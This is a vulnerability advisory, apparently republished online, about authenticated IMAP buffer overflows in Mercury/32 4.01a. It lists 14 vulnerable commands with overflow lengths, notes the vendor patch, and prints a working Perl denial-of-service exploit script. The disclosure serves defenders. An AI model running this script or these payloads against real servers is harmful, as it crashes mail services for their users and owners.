Mercury Mail Multiple Buffer OverflowsSummary
Mercury is "a free, standards-based mail server solution, providing comprehensive, fast server support for all major Internet e-mail protocols. It is supplied in two versions, one hosted on Windows systems, the other running as a set of NLMs on Novell NetWare file servers".
An authenticated user can trigger several buffer overflows and possibly run arbitrary code on the Mercury Mail server.
Credit:
The information has been provided by Reed Arvin.
Details
Vulnerable Systems:
* Mercury/32 version 4.01a
Immune Systems:
* Mercury/32 version 4.01b and later
There are 14 vulnerable commands that can be used to cause buffer overflows to occur. After a successful login to the mail server, if any of these commands are used with an overly long argument the application closes resulting in a denial of service.
The commands and approximate argument lengths are as follows:
EXAMINE A x 512 \r\n
SUBSCRIBE A x 512 \r\n
STATUS A x 512 \r\n
APPEND A x 512 \r\n
CHECK A x 512 \r\n
CLOSE A x 512 \r\n
EXPUNGE A x 512 \r\n
FETCH A x 512 \r\n
RENAME A x 768 \r\n
DELETE A x 768 \r\n
LIST A x 768 \r\n
SEARCH A x 768 \r\n
CREATE A x 1024 \r\n
UNSUBSCRIBE A x 1024 \r\n
Vendor Status:
The vendor was notified an patch was released to solve the issues. For more details visit the patches page at: http://www.pmail.com/patches.htm
Exploit Code:
#===== Start Mercury32_Overflow.pl =====
#
# Usage: Mercury32_Overflow.pl <ip> <imap4 user> <imap4 pass>
# Mercury32_Overflow.pl 127.0.0.1 hello moto
#
# Mercury/32, v4.01a, Dec 8 2003
#
# Download:
# http://www.pmail.com/
#
###########################
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "143",
Proto => "TCP"))
{
print "Attempting to kill Mercury/32 service at $ARGV[0]:143...";
sleep(1);
print $socket "0000 LOGIN $ARGV[1] $ARGV[2]\r\n";
sleep(1);
print $socket "0001 CHECK " . "A" x 512 . "\r\n";
close($socket);
sleep(1);
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "143",
Proto => "TCP"))
{
close($socket);
print "failed!\n";
}
else
{
print "successful!\n";
}
}
else
{
print "Cannot connect to $ARGV[0]:143\n";
}
#===== End Mercury32_Overflow.pl =====
推荐
评论(0条)
